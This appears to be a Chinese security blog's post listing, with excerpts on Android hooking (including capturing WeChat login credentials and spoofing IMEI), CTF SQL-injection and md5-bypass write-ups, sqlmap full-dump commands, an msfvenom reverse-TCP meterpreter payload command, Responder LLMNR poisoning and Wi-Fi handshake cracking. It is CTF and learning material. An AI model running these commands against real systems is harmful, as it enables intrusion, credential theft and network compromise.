- 博客(28)
- 资源 (1)
- 收藏
- 关注
原创 微信hook——登录界面的账号密码
Hook方法一: 手机号码登陆,Method跟踪点击登陆事件: 点击事件内容 分析bj方法,有两个string参数,依然最后调用了com.tencent.mm.modelsimple.q,hook这个bj方法,查看两个参数是什么。 Hook方法: 得到的结果:Hook成功! Hook方法二 微信号、QQ登陆,me...
2019-02-12 00:43:46
2422
原创 xposed实践(二)、修改手机IMEI值
1.bridgeApi导入lib文件夹中,module中添加编译。 2.Activity中实现getDevice方法 3.新建类实现IXposedHookLoadPack接口静态方法和静态类的使用 4.在assets文件夹中新建xposed_init文件,添加3中的类名 5.修改manifest,增加标签<meta-data ...
2018-12-28 17:58:38
2578
原创 xposed实践(一)、插件完成hook
一共两个应用;一个目标应用,一个插件应用一、目标app实现: 二、Hook插件的实现1.新建一个工程,导入XposedBridgeApi-54库,添加manifest说明项。 2.新建类,实现IXposedHookLoadPackage接口。 3.新建xposed_init文件,添加新建类的名称。 4.运行,添加插件就好了 效果:被hoo...
2018-12-28 17:54:42
1050
原创 JDOM解析xml
<PeopleList> <People id="1"> <Name en='zhangsan'>张三</Name> <Age>20</Age> </People> <People id="2"&
2018-11-23 11:46:51
173
原创 加固前奏2-替换application
运行加载过程ActivityThread.JAVAApplication app = data.info.makeApplication(data.restrictedBackupMode, null); ->进入LoadedApk.java String ap...
2018-11-21 16:57:44
462
原创 加固前奏1-替换classloader
使用反射实现替换classLoader1.获取"android.app.ActivityThread"中的"mPackages" ;定义为arraymap<String,weakReference<LoadedApk>> mPackages c = Class.forName("android.app.ActivityThread"); ...
2018-11-21 14:01:50
454
原创 smali语法的复习整理
1.基本数据类型smali类型 java类型 V void (只能用于返回值类型) Z boolean B byte S short C char I int J long F float D double 2...
2018-11-20 00:14:33
246
原创 arm反编译-四则运算
int main() { int a, b, c, d; unsigned int ua; a = 100; b = a; //字符串 char say[] = "hello"; scanf("%d,%d", &a, &b); printf("a=%d,b=%d", a, b); b = 5; //加...
2018-11-02 22:58:28
943
原创 将so文件给外部工程引用
调用第三方so文件,无需包名与so文件中的呼应java方法相同,就是创建一个jar,使它的包名和so中的包名相同。 1.新建一个测试工程,创建好c++代码,cmake照旧写入。图1.1、测试工程目录 2.建立library新建一个Android library的module,建立两个测试类,在其中一个测试类中导入lib,新建native方法,回到native-lib.c...
2018-10-25 19:46:13
961
原创 Android导出so文件
1.创建工程生成c++,包名为com.cc.test_socreator,内容: 此时可以在MainActivity中使用代码调用stringFromJNI:可以在jniTest中调用getString: 2.生成so文件Build-make project在没有报错,工程建立以后会在build-intermediates-cmake-debug下生成so...
2018-10-25 19:42:51
778
原创 so文件简单的导出使用
1.创建工程生成c++,包名为com.cc.test_socreator,内容:此时可以在MainActivity中使用代码调用stringFromJNI:可以在jniTest中调用getString: 2.生成so文件Build-make project在没有报错,工程建立以后会在build-intermediates-cmake-debug下生成so。签名以...
2018-10-24 18:46:07
1358
原创 约束的sql攻击
PHP mysql_real_escape_string() 函数mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:\x00\n\r\'"\x1a如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。在sql执行字符串处理的时候,字符串末尾的空格符都会被删除,以下两个字符串结果相等SE...
2018-08-21 20:15:06
859
原创 忘记密码了 - bugku
http://ctf5.shiyanbar.com/10/upload/step1.php查看源码以后发现有个管理员地址<meta name="admin" content="admin@simplexue.com" />邮箱填写该地址,弹出邮件发到管理员邮箱了,你看不到的随便更换一个邮箱地址,弹出 ./step2.php?email=youmail@mail.com&am...
2018-08-21 20:14:06
571
原创 sql注入点的判断
判断sql注入点1.单引号判断 http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。2.and判断 http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页 http://www.xxx.com/xxx.asp?id=10'and 1=2如...
2018-08-21 20:12:34
14687
2
原创 sqlmap的post使用方法
http://120.24.86.145:8002/chengjidan/index.php注入通过post提交id查询。1.使用burpSuite拦截post包,复制下数据包为a.txt2.sqlmap -r a.txt -p 参数 --batch 默认选择 --dump-all 直接爆破所有例如sqlmap -r a.txt -p username --batch --dum...
2018-08-21 20:11:54
2873
原创 never give up - bugku
http://120.24.86.145:8006/test/hello.php?id=1看源码知道存在一个1p.html的网页。查看1p.html源码var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMj...
2018-08-21 20:11:23
499
原创 php中绕过md5检验
<?phpif(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1)...
2018-08-21 20:10:03
2373
原创 点击一百万次-GET转POST发送
点击一百万次,bugku中的一道题。通过js判断点击数目,然后使用post将clicks次数发送给服务器。 if(clicks >= 1000000){ var form = $('<form action="" method="post">' + '<input type...
2018-08-21 20:08:46
2035
原创 mobile1(gctf)
bugku中的安卓题。重点部分,smalismali中的循环 隔位去字符 const/4 v4, 0x0 .local v4, "i":I :goto_1 invoke-virtual {v3}, Ljava/lang/String;->length()I move-result v8 if-ge v4, v8, :cond_2...
2018-08-21 20:06:49
1947
原创 forms-隐藏处理
http://ctf5.shiyanbar.com/10/main.php获取pin码。查看网页源码<form action="" method="post"> PIN:<br> <input type="password" name="PIN" value=""> <input
2018-08-09 21:44:47
901
原创 简单的sql注入之3-盲注
http://ctf5.shiyanbar.com/web/index_3.php盲注猜数据库名 方法一:(可以通过burpsuite拦截数据包,更改ascii值重发获取) 1' and length(database())=4 #数据库名长度是4 1' and ascii(substr(database(),1,1))=119# w...
2018-08-09 21:42:26
1689
1
转载 md5绕过_ffifdyop
地址:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php源码: <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $...
2018-08-07 23:01:06
2771
原创 sqlmap的使用
实验吧简单注入,地址http://ctf5.shiyanbar.com/8/index.php?id=1当输入id=1 and 1=1 和 id=1 and 1=2分别出现不同的搜索结果,说明存在注入点,直接上sqlmap。 爆破整个数据库:sqlmap -u http://ctf5.shiyanbar.com/8/index.php?id=1 --batch --dump...
2018-08-07 22:31:42
134
原创 msfvenom 简单利用记录
msfvenom常用参数大概就是-p (payload) ,-e(encoder),-i(encoder次数),-o(输出路径),-f(输出文件类型)。 简单生成一个反弹tcp的exe文件,使用编码方式是xor:msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.0.120 LPORT=4444 -e xor -...
2018-08-05 16:19:20
512
翻译 LLMNR/NBT-NS欺骗攻击 responder
启动responder responder -wrf --lm -v -I eth0在被监控主机上操作如\\1.1.1.1\share操作,会发出一个广播,被responder监听监听到数据文件保存位置/usr/share/responder/logs下,使用john破解密码待完善......
2018-07-10 23:47:49
608
翻译 airmon-ng爆破wifi
1.airmon-ng start wlan3,启动网卡.2.开启监控,airodump-ng wlan0mon,可以查看到可以wifi的基本信息3.针对网络进行监听。-c是管道,-w phi 我也不知道是什么,好像是指定的包类型。4.进入监听以后,可以看到有两台机器连接到wifi。我们需要抓到handshake的包,也就是握手包的信息。5.伪造发送下线命令,客户端就会重连wifi,此时我们可以抓...
2018-07-10 23:16:36
572
原创 linux用户管理
1.添加用户百度说可以用useradd和adduser,其实不行;useradd不能再/home下创建文件夹,应该用adduser。adduser test
2018-07-08 14:23:06
141
原创 ubuntu自动重连l2tp并转发
#自动重连shell#!/bin/shppp0_flag=`ifconfig | grep ppp0`echo $ppp0_flagif [ -z "$ppp0_flag" ];then echo "connet to vpn ..." # connet vpn # USER_PASSWORD 为用户密码,这样的方式就不用输入密码了。 # echo PASS...
2018-07-01 19:30:55
1732
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人